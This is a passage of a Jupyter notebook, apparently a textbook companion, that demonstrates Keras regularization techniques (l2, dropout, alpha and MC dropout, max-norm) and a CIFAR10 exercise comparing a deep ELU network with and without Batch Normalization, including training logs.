[==============================] - 1s 2ms/step - loss: 0.2943 - accuracy: 0.8927 - val_loss: 0.3392 - val_accuracy: 0.8806\nEpoch 11/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2838 - accuracy: 0.8963 - val_loss: 0.3467 - val_accuracy: 0.8800\nEpoch 12/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2707 - accuracy: 0.9024 - val_loss: 0.3646 - val_accuracy: 0.8696\nEpoch 13/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2536 - accuracy: 0.9079 - val_loss: 0.3350 - val_accuracy: 0.8842\nEpoch 14/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2405 - accuracy: 0.9135 - val_loss: 0.3465 - val_accuracy: 0.8794\nEpoch 15/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2279 - accuracy: 0.9185 - val_loss: 0.3257 - val_accuracy: 0.8830\nEpoch 16/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2159 - accuracy: 0.9232 - val_loss: 0.3294 - val_accuracy: 0.8824\nEpoch 17/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2062 - accuracy: 0.9263 - val_loss: 0.3333 - val_accuracy: 0.8882\nEpoch 18/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1978 - accuracy: 0.9301 - val_loss: 0.3235 - val_accuracy: 0.8898\nEpoch 19/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1892 - accuracy: 0.9337 - val_loss: 0.3233 - val_accuracy: 0.8906\nEpoch 20/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1821 - accuracy: 0.9365 - val_loss: 0.3224 - val_accuracy: 0.8928\nEpoch 21/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1752 - accuracy: 0.9400 - val_loss: 0.3220 - val_accuracy: 0.8908\nEpoch 22/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1700 - accuracy: 0.9416 - val_loss: 0.3180 - val_accuracy: 0.8962\nEpoch 23/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1655 - accuracy: 0.9438 - val_loss: 0.3187 - val_accuracy: 0.8940\nEpoch 24/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1627 - accuracy: 0.9454 - val_loss: 0.3177 - val_accuracy: 0.8932\nEpoch 25/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1610 - accuracy: 0.9462 - val_loss: 0.3170 - val_accuracy: 0.8934\n" ] ], [ [ "# Avoiding Overfitting Through Regularization", "_____no_output_____" ], [ "## $\\ell_1$ and $\\ell_2$ regularization", "_____no_output_____" ] ], [ [ "layer = keras.layers.Dense(100, activation=\"elu\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(0.01))\n# or l1(0.1) for ℓ1 regularization with a factor of 0.1\n# or l1_l2(0.1, 0.01) for both ℓ1 and ℓ2 regularization, with factors 0.1 and 0.01 respectively", "_____no_output_____" ], [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"elu\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(0.01)),\n keras.layers.Dense(100, activation=\"elu\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(0.01)),\n keras.layers.Dense(10, activation=\"softmax\",\n kernel_regularizer=keras.regularizers.l2(0.01))\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 2\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/2\n1719/1719 [==============================] - 6s 3ms/step - loss: 3.2189 - accuracy: 0.7967 - val_loss: 0.7169 - val_accuracy: 0.8340\nEpoch 2/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.7280 - accuracy: 0.8247 - val_loss: 0.6850 - val_accuracy: 0.8376\n" ], [ "from functools import partial\n\nRegularizedDense = partial(keras.layers.Dense,\n activation=\"elu\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(0.01))\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n RegularizedDense(300),\n RegularizedDense(100),\n RegularizedDense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 2\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/2\n1719/1719 [==============================] - 6s 3ms/step - loss: 3.2911 - accuracy: 0.7924 - val_loss: 0.7218 - val_accuracy: 0.8310\nEpoch 2/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.7282 - accuracy: 0.8245 - val_loss: 0.6826 - val_accuracy: 0.8382\n" ] ], [ [ "## Dropout", "_____no_output_____" ] ], [ [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dropout(rate=0.2),\n keras.layers.Dense(300, activation=\"elu\", kernel_initializer=\"he_normal\"),\n keras.layers.Dropout(rate=0.2),\n keras.layers.Dense(100, activation=\"elu\", kernel_initializer=\"he_normal\"),\n keras.layers.Dropout(rate=0.2),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 2\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/2\n1719/1719 [==============================] - 6s 3ms/step - loss: 0.7611 - accuracy: 0.7576 - val_loss: 0.3730 - val_accuracy: 0.8644\nEpoch 2/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.4306 - accuracy: 0.8401 - val_loss: 0.3395 - val_accuracy: 0.8722\n" ] ], [ [ "## Alpha Dropout", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.AlphaDropout(rate=0.2),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.AlphaDropout(rate=0.2),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.AlphaDropout(rate=0.2),\n keras.layers.Dense(10, activation=\"softmax\")\n])\noptimizer = keras.optimizers.SGD(learning_rate=0.01, momentum=0.9, nesterov=True)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])\nn_epochs = 20\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.8023 - accuracy: 0.7146 - val_loss: 0.5781 - val_accuracy: 0.8442\nEpoch 2/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.5663 - accuracy: 0.7905 - val_loss: 0.5182 - val_accuracy: 0.8520\nEpoch 3/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5264 - accuracy: 0.8054 - val_loss: 0.4874 - val_accuracy: 0.8600\nEpoch 4/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5126 - accuracy: 0.8092 - val_loss: 0.4890 - val_accuracy: 0.8598\nEpoch 5/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5071 - accuracy: 0.8133 - val_loss: 0.4266 - val_accuracy: 0.8696\nEpoch 6/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4793 - accuracy: 0.8198 - val_loss: 0.4585 - val_accuracy: 0.8640\nEpoch 7/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4724 - accuracy: 0.8262 - val_loss: 0.4740 - val_accuracy: 0.8612\nEpoch 8/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4570 - accuracy: 0.8297 - val_loss: 0.4295 - val_accuracy: 0.8656\nEpoch 9/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4632 - accuracy: 0.8286 - val_loss: 0.4357 - val_accuracy: 0.8736\nEpoch 10/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4552 - accuracy: 0.8340 - val_loss: 0.4366 - val_accuracy: 0.8674\nEpoch 11/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4461 - accuracy: 0.8346 - val_loss: 0.4278 - val_accuracy: 0.8684\nEpoch 12/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4419 - accuracy: 0.8351 - val_loss: 0.5086 - val_accuracy: 0.8558\nEpoch 13/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4329 - accuracy: 0.8385 - val_loss: 0.4280 - val_accuracy: 0.8728\nEpoch 14/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4305 - accuracy: 0.8399 - val_loss: 0.4460 - val_accuracy: 0.8628\nEpoch 15/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4315 - accuracy: 0.8397 - val_loss: 0.4361 - val_accuracy: 0.8706\nEpoch 16/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4251 - accuracy: 0.8403 - val_loss: 0.4280 - val_accuracy: 0.8758\nEpoch 17/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4207 - accuracy: 0.8427 - val_loss: 0.5336 - val_accuracy: 0.8584\nEpoch 18/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4365 - accuracy: 0.8387 - val_loss: 0.4769 - val_accuracy: 0.8736\nEpoch 19/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4262 - accuracy: 0.8409 - val_loss: 0.4636 - val_accuracy: 0.8706\nEpoch 20/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4189 - accuracy: 0.8421 - val_loss: 0.4388 - val_accuracy: 0.8760\n" ], [ "model.evaluate(X_test_scaled, y_test)", "313/313 [==============================] - 0s 834us/step - loss: 0.4723 - accuracy: 0.8639\n" ], [ "model.evaluate(X_train_scaled, y_train)", "1719/1719 [==============================] - 1s 782us/step - loss: 0.3501 - accuracy: 0.8840\n" ], [ "history = model.fit(X_train_scaled, y_train)", "1719/1719 [==============================] - 2s 1ms/step - loss: 0.4225 - accuracy: 0.8432\n" ] ], [ [ "## MC Dropout", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "y_probas = np.stack([model(X_test_scaled, training=True)\n for sample in range(100)])\ny_proba = y_probas.mean(axis=0)\ny_std = y_probas.std(axis=0)", "_____no_output_____" ], [ "np.round(model.predict(X_test_scaled[:1]), 2)", "_____no_output_____" ], [ "np.round(y_probas[:, :1], 2)", "_____no_output_____" ], [ "np.round(y_proba[:1], 2)", "_____no_output_____" ], [ "y_std = y_probas.std(axis=0)\nnp.round(y_std[:1], 2)", "_____no_output_____" ], [ "y_pred = np.argmax(y_proba, axis=1)", "_____no_output_____" ], [ "accuracy = np.sum(y_pred == y_test) / len(y_test)\naccuracy", "_____no_output_____" ], [ "class MCDropout(keras.layers.Dropout):\n def call(self, inputs):\n return super().call(inputs, training=True)\n\nclass MCAlphaDropout(keras.layers.AlphaDropout):\n def call(self, inputs):\n return super().call(inputs, training=True)", "_____no_output_____" ], [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "mc_model = keras.models.Sequential([\n MCAlphaDropout(layer.rate) if isinstance(layer, keras.layers.AlphaDropout) else layer\n for layer in model.layers\n])", "_____no_output_____" ], [ "mc_model.summary()", "Model: \"sequential_20\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nflatten_18 (Flatten) (None, 784) 0 \n_________________________________________________________________\nmc_alpha_dropout (MCAlphaDro (None, 784) 0 \n_________________________________________________________________\ndense_262 (Dense) (None, 300) 235500 \n_________________________________________________________________\nmc_alpha_dropout_1 (MCAlphaD (None, 300) 0 \n_________________________________________________________________\ndense_263 (Dense) (None, 100) 30100 \n_________________________________________________________________\nmc_alpha_dropout_2 (MCAlphaD (None, 100) 0 \n_________________________________________________________________\ndense_264 (Dense) (None, 10) 1010 \n=================================================================\nTotal params: 266,610\nTrainable params: 266,610\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "optimizer = keras.optimizers.SGD(learning_rate=0.01, momentum=0.9, nesterov=True)\nmc_model.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])", "_____no_output_____" ], [ "mc_model.set_weights(model.get_weights())", "_____no_output_____" ] ], [ [ "Now we can use the model with MC Dropout:", "_____no_output_____" ] ], [ [ "np.round(np.mean([mc_model.predict(X_test_scaled[:1]) for sample in range(100)], axis=0), 2)", "_____no_output_____" ] ], [ [ "## Max norm", "_____no_output_____" ] ], [ [ "layer = keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\",\n kernel_constraint=keras.constraints.max_norm(1.))", "_____no_output_____" ], [ "MaxNormDense = partial(keras.layers.Dense,\n activation=\"selu\", kernel_initializer=\"lecun_normal\",\n kernel_constraint=keras.constraints.max_norm(1.))\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n MaxNormDense(300),\n MaxNormDense(100),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 2\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.5763 - accuracy: 0.8020 - val_loss: 0.3674 - val_accuracy: 0.8674\nEpoch 2/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.3545 - accuracy: 0.8709 - val_loss: 0.3714 - val_accuracy: 0.8662\n" ] ], [ [ "# Exercises", "_____no_output_____" ], [ "## 1. to 7.", "_____no_output_____" ], [ "See appendix A.", "_____no_output_____" ], [ "## 8. Deep Learning on CIFAR10", "_____no_output_____" ], [ "### a.\n*Exercise: Build a DNN with 20 hidden layers of 100 neurons each (that's too many, but it's the point of this exercise). Use He initialization and the ELU activation function.*", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n activation=\"elu\",\n kernel_initializer=\"he_normal\"))", "_____no_output_____" ] ], [ [ "### b.\n*Exercise: Using Nadam optimization and early stopping, train the network on the CIFAR10 dataset. You can load it with `keras.datasets.cifar10.load_data()`. The dataset is composed of 60,000 32 × 32–pixel color images (50,000 for training, 10,000 for testing) with 10 classes, so you'll need a softmax output layer with 10 neurons. Remember to search for the right learning rate each time you change the model's architecture or hyperparameters.*", "_____no_output_____" ], [ "Let's add the output layer to the model:", "_____no_output_____" ] ], [ [ "model.add(keras.layers.Dense(10, activation=\"softmax\"))", "_____no_output_____" ] ], [ [ "Let's use a Nadam optimizer with a learning rate of 5e-5. I tried learning rates 1e-5, 3e-5, 1e-4, 3e-4, 1e-3, 3e-3 and 1e-2, and I compared their learning curves for 10 epochs each (using the TensorBoard callback, below). The learning rates 3e-5 and 1e-4 were pretty good, so I tried 5e-5, which turned out to be slightly better.", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Nadam(learning_rate=5e-5)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])", "_____no_output_____" ] ], [ [ "Let's load the CIFAR10 dataset. We also want to use early stopping, so we need a validation set. Let's use the first 5,000 images of the original training set as the validation set:", "_____no_output_____" ] ], [ [ "(X_train_full, y_train_full), (X_test, y_test) = keras.datasets.cifar10.load_data()\n\nX_train = X_train_full[5000:]\ny_train = y_train_full[5000:]\nX_valid = X_train_full[:5000]\ny_valid = y_train_full[:5000]", "_____no_output_____" ] ], [ [ "Now we can create the callbacks we need and train the model:", "_____no_output_____" ] ], [ [ "early_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_logs\", \"run_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]", "_____no_output_____" ], [ "%tensorboard --logdir=./my_cifar10_logs --port=6006", "_____no_output_____" ], [ "model.fit(X_train, y_train, epochs=100,\n validation_data=(X_valid, y_valid),\n callbacks=callbacks)", "Epoch 1/100\n1407/1407 [==============================] - 9s 5ms/step - loss: 9.4191 - accuracy: 0.1388 - val_loss: 2.2328 - val_accuracy: 0.2040\nEpoch 2/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 2.1097 - accuracy: 0.2317 - val_loss: 2.0485 - val_accuracy: 0.2402\nEpoch 3/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.9667 - accuracy: 0.2844 - val_loss: 1.9681 - val_accuracy: 0.2964\nEpoch 4/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.8740 - accuracy: 0.3149 - val_loss: 1.9178 - val_accuracy: 0.3254\nEpoch 5/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.8064 - accuracy: 0.3423 - val_loss: 1.8256 - val_accuracy: 0.3384\nEpoch 6/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.7525 - accuracy: 0.3595 - val_loss: 1.7430 - val_accuracy: 0.3692\nEpoch 7/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.7116 - accuracy: 0.3819 - val_loss: 1.7199 - val_accuracy: 0.3824\nEpoch 8/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.6782 - accuracy: 0.3935 - val_loss: 1.6746 - val_accuracy: 0.3972\nEpoch 9/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.6517 - accuracy: 0.4025 - val_loss: 1.6622 - val_accuracy: 0.4004\nEpoch 10/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.6140 - accuracy: 0.4194 - val_loss: 1.7065 - val_accuracy: 0.3840\nEpoch 11/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5884 - accuracy: 0.4301 - val_loss: 1.6736 - val_accuracy: 0.3914\nEpoch 12/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5640 - accuracy: 0.4378 - val_loss: 1.6220 - val_accuracy: 0.4224\nEpoch 13/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5437 - accuracy: 0.4448 - val_loss: 1.6332 - val_accuracy: 0.4144\nEpoch 14/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5214 - accuracy: 0.4555 - val_loss: 1.5785 - val_accuracy: 0.4326\nEpoch 15/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5117 - accuracy: 0.4564 - val_loss: 1.6267 - val_accuracy: 0.4164\nEpoch 16/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4972 - accuracy: 0.4622 - val_loss: 1.5846 - val_accuracy: 0.4316\nEpoch 17/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4888 - accuracy: 0.4661 - val_loss: 1.5549 - val_accuracy: 0.4420\nEpoch 18/100\n<<24 more lines>>\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.3362 - accuracy: 0.5212 - val_loss: 1.6025 - val_accuracy: 0.4500\nEpoch 31/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3360 - accuracy: 0.5207 - val_loss: 1.5175 - val_accuracy: 0.4602\nEpoch 32/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.3031 - accuracy: 0.5302 - val_loss: 1.5397 - val_accuracy: 0.4572\nEpoch 33/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.3082 - accuracy: 0.5308 - val_loss: 1.4997 - val_accuracy: 0.4776\nEpoch 34/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.2882 - accuracy: 0.5338 - val_loss: 1.5482 - val_accuracy: 0.4620\nEpoch 35/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.2889 - accuracy: 0.5355 - val_loss: 1.5474 - val_accuracy: 0.4604\nEpoch 36/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2761 - accuracy: 0.5410 - val_loss: 1.5434 - val_accuracy: 0.4658\nEpoch 37/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2658 - accuracy: 0.5481 - val_loss: 1.5502 - val_accuracy: 0.4706\nEpoch 38/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2554 - accuracy: 0.5489 - val_loss: 1.5527 - val_accuracy: 0.4624\nEpoch 39/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2504 - accuracy: 0.5471 - val_loss: 1.5482 - val_accuracy: 0.4602\nEpoch 40/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2516 - accuracy: 0.5545 - val_loss: 1.5881 - val_accuracy: 0.4574\nEpoch 41/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2401 - accuracy: 0.5566 - val_loss: 1.5403 - val_accuracy: 0.4670\nEpoch 42/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.2305 - accuracy: 0.5570 - val_loss: 1.5343 - val_accuracy: 0.4790\nEpoch 43/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2228 - accuracy: 0.5615 - val_loss: 1.5344 - val_accuracy: 0.4708\nEpoch 44/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2161 - accuracy: 0.5619 - val_loss: 1.5782 - val_accuracy: 0.4526\nEpoch 45/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2124 - accuracy: 0.5641 - val_loss: 1.5182 - val_accuracy: 0.4794\nEpoch 46/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1870 - accuracy: 0.5766 - val_loss: 1.5435 - val_accuracy: 0.4650\nEpoch 47/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1925 - accuracy: 0.5701 - val_loss: 1.5532 - val_accuracy: 0.4686\n" ], [ "model = keras.models.load_model(\"my_cifar10_model.h5\")\nmodel.evaluate(X_valid, y_valid)", "157/157 [==============================] - 0s 1ms/step - loss: 1.4960 - accuracy: 0.4762\n" ] ], [ [ "The model with the lowest validation loss gets about 47.6% accuracy on the validation set. It took 27 epochs to reach the lowest validation loss, with roughly 8 seconds per epoch on my laptop (without a GPU). Let's see if we can improve performance using Batch Normalization.", "_____no_output_____" ], [ "### c.\n*Exercise: Now try adding Batch Normalization and compare the learning curves: Is it converging faster than before? Does it produce a better model? How does it affect training speed?*", "_____no_output_____" ], [ "The code below is very similar to the code above, with a few changes:\n\n* I added a BN layer after every Dense layer (before the activation function), except for the output layer. I also added a BN layer before the first hidden layer.\n* I changed the learning rate to 5e-4. I experimented with 1e-5, 3e-5, 5e-5, 1e-4, 3e-4, 5e-4, 1e-3 and 3e-3, and I chose the one with the best validation performance after 20 epochs.\n* I renamed the run directories to run_bn_* and the model file name to my_cifar10_bn_model.h5.", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nmodel.add(keras.layers.BatchNormalization())\nfor _ in range(20):\n model.add(keras.layers.Dense(100, kernel_initializer=\"he_normal\"))\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.Activation(\"elu\"))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.Nadam(learning_rate=5e-4)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_bn_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_logs\", \"run_bn_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]\n\nmodel.fit(X_train, y_train, epochs=100,\n validation_data=(X_valid, y_valid),\n callbacks=callbacks)\n\nmodel = keras.models.load_model(\"my_cifar10_bn_model.h5\")\nmodel.evaluate(X_valid, y_valid)", "Epoch 1/100\n1407/1407 [==============================] - 19s 9ms/step - loss: 1.9765 - accuracy: 0.2968 - val_loss: 1.6602 - val_accuracy: 0.4042\nEpoch 2/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.6787 - accuracy: 0.4056 - val_loss: 1.5887 - val_accuracy: 0.4304\nEpoch 3/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.6097 - accuracy: 0.4274 - val_loss: 1.5781 - val_accuracy: 0.4326\nEpoch 4/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.5574 - accuracy: 0.4486 - val_loss: 1.5064 - val_accuracy: 0.4676\nEpoch 5/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.5075 - accuracy: 0.4642 - val_loss: 1.4412 - val_accuracy: 0.4844\nEpoch 6/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.4664 - accuracy: 0.4787 - val_loss: 1.4179 - val_accuracy: 0.4984\nEpoch 7/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.4334 - accuracy: 0.4932 - val_loss: 1.4277 - val_accuracy: 0.4906\nEpoch 8/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.4054 - accuracy: 0.5038 - val_loss: 1.3843 - val_accuracy: 0.5130\nEpoch 9/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.3816 - accuracy: 0.5106 - val_loss: 1.3691 - val_accuracy: 0.5108\nEpoch 10/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.3547 - accuracy: 0.5206 - val_loss: 1.3552 - val_accuracy: 0.5226\nEpoch 11/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 1.3244 - accuracy: 0.5371 - val_loss: 1.3678 - val_accuracy: 0.5142\nEpoch 12/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.3078 - accuracy: 0.5393 - val_loss: 1.3844 - val_accuracy: 0.5080\nEpoch 13/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 1.2889 - accuracy: 0.5431 - val_loss: 1.3566 - val_accuracy: 0.5164\nEpoch 14/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 1.2607 - accuracy: 0.5559 - val_loss: 1.3626 - val_accuracy: 0.5248\nEpoch 15/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.2580 - accuracy: 0.5587 - val_loss: 1.3616 - val_accuracy: 0.5276\nEpoch 16/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.2441 - accuracy: 0.5586 - val_loss: 1.3350 - val_accuracy: 0.5286\nEpoch 17/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.2241 - accuracy: 0.5676 - val_loss: 1.3370 - val_accuracy: 0.5408\nEpoch 18/100\n<<29 more lines>>\nEpoch 33/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.0336 - accuracy: 0.6369 - val_loss: 1.3682 - val_accuracy: 0.5450\nEpoch 34/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.0228 - accuracy: 0.6388 - val_loss: 1.3348 - val_accuracy: 0.5458\nEpoch 35/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.0205 - accuracy: 0.6407 - val_loss: 1.3490 - val_accuracy: 0.5440\nEpoch 36/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 1.0008 - accuracy: 0.6489 - val_loss: 1.3568 - val_accuracy: 0.5408\nEpoch 37/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9785 - accuracy: 0.6543 - val_loss: 1.3628 - val_accuracy: 0.5396\nEpoch 38/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9832 - accuracy: 0.6592 - val_loss: 1.3617 - val_accuracy: 0.5482\nEpoch 39/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 0.9707 - accuracy: 0.6581 - val_loss: 1.3767 - val_accuracy: 0.5446\nEpoch 40/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9590 - accuracy: 0.6651 - val_loss: 1.4200 - val_accuracy: 0.5314\nEpoch 41/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9548 - accuracy: 0.6668 - val_loss: 1.3692 - val_accuracy: 0.5450\nEpoch 42/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9480 - accuracy: 0.6667 - val_loss: 1.3841 - val_accuracy: 0.5310\nEpoch 43/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9411 - accuracy: 0.6716 - val_loss: 1.4036 - val_accuracy: 0.5382\nEpoch 44/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9383 - accuracy: 0.6708 - val_loss: 1.4114 - val_accuracy: 0.5236\nEpoch 45/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9258 - accuracy: 0.6769 - val_loss: 1.4224 - val_accuracy: 0.5324\nEpoch 46/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9072 - accuracy: 0.6836 - val_loss: 1.3875 - 